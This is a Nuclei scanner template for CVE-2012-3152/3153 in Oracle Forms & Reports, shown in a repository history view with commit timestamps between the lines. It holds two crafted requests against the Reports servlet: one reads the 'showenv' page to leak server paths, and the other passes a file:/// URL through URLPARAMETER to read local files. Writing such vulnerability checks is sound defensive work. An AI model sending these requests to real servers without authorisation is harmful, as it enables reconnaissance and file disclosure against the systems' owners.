nuclei-templates/cves/2012/CVE-2012-3153.yaml

48 lines
1.3 KiB
YAML
Raw Normal View History

id: CVE-2012-3153
2021-06-21 08:48:42 +00:00
info:
name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
2021-06-21 08:48:42 +00:00
author: Sid Ahmed MALAOUI @ Realistic Security
severity: critical
description: |
Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
2021-06-21 08:48:42 +00:00
vectors related to Report Server Component.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-3152
- https://www.exploit-db.com/exploits/31737
tags: cve,cve2012,oracle,rce
requests:
- method: GET
path:
- "{{BaseURL}}/reports/rwservlet/showenv"
2021-06-21 08:48:42 +00:00
- "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
2021-06-23 18:18:34 +00:00
req-condition: true
matchers-condition: and
2021-06-21 08:48:42 +00:00
matchers:
- type: dsl
dsl:
2021-07-03 19:35:05 +00:00
- 'contains(body_1, "Reports Servlet")'
2021-06-23 18:18:34 +00:00
2021-06-23 18:43:58 +00:00
- type: status
status:
- 200
2021-06-23 18:18:34 +00:00
- type: dsl
dsl:
2021-06-29 07:11:19 +00:00
- '!contains(body_2, "<html")'
- '!contains(body_2, "<HTML")'
2021-06-23 18:18:34 +00:00
condition: and
extractors:
- type: regex
name: windows_working_path
regex:
- ".?.?\\\\.*\\\\showenv"
- type: regex
name: linux_working_path
regex:
- "/.*/showenv"